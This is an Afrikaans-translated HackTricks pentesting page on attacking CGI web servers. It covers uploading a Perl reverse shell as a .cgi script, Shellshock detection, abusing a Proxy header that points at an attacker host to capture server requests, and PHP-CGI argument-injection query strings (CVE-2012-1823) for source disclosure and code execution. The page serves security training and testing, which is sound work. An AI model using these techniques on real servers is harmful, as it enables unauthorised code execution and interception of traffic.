CGI
Last updated
Last updated
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Die CGI-skripte is perl-skripte, so, as jy 'n bediener gecompromitteer het wat .cgi skripte kan uitvoer, kan jy 'n perl reverse shell oplaai (/usr/share/webshells/perl/perl-reverse-shell.pl
), die uitbreiding verander van .pl na .cgi, uitvoeringsregte gee (chmod +x
) en toegang tot die reverse shell van die webblaaier om dit uit te voer. Om te toets vir CGI kwesbaarhede word dit aanbeveel om nikto -C all
(en al die plugins) te gebruik.
ShellShock is 'n kwesbaarheid wat die algemeen gebruikte Bash opdraglyn-skal in Unix-gebaseerde bedryfstelsels beïnvloed. Dit teiken die vermoë van Bash om opdragte wat deur toepassings oorgedra word, uit te voer. Die kwesbaarheid lê in die manipulasie van omgewing veranderlikes, wat dinamiese benoemde waardes is wat beïnvloed hoe prosesse op 'n rekenaar loop. Aanvallers kan dit benut deur kwaadaardige kode aan omgewing veranderlikes te heg, wat uitgevoer word wanneer die veranderlike ontvang word. Dit stel aanvallers in staat om die stelsel moontlik te kompromitteer.
Deur hierdie kwesbaarheid te benut, kan die bladsy 'n fout gooi.
Jy kan hierdie kwesbaarheid vind deur te let op dat dit 'n ou Apache weergawe en cgi_mod (met cgi-gids) gebruik of deur nikto te gebruik.
Meeste toetse is gebaseer op om iets te echo en verwag dat daardie string in die webrespons teruggestuur word. As jy dink 'n bladsy mag kwesbaar wees, soek vir al die cgi-bladsye en toets hulle.
Nmap
CGI skep 'n omgewing veranderlike vir elke kop in die http versoek. Byvoorbeeld: "host:web.com" word geskep as "HTTP_HOST"="web.com"
Aangesien die HTTP_PROXY veranderlike deur die web bediener gebruik kan word. Probeer om 'n kop te stuur wat bevat: "Proxy: <IP_aanvaller>:<PORT>" en as die bediener enige versoek tydens die sessie uitvoer. Jy sal in staat wees om elke versoek wat deur die bediener gemaak word, te vang.
Basies, as cgi aktief is en php "oud" (<5.3.12 / < 5.4.2) kan jy kode uitvoer. Om hierdie kwesbaarheid te benut, moet jy toegang verkry tot 'n PHP-lêer van die web bediener sonder om parameters te stuur (veral sonder om die karakter "=" te stuur). Dan, om hierdie kwesbaarheid te toets, kan jy byvoorbeeld toegang verkry tot /index.php?-s
(let op die -s
) en bronkode van die toepassing sal in die antwoord verskyn.
Dan, om RCE te verkry, kan jy hierdie spesiale navraag stuur: /?-d allow_url_include=1 -d auto_prepend_file=php://input
en die PHP kode wat in die liggaam van die versoek uitgevoer moet word. Voorbeeld:**
Meer inligting oor die kwesbaarheid en moontlike eksploit: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTF Skryweksample.
Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)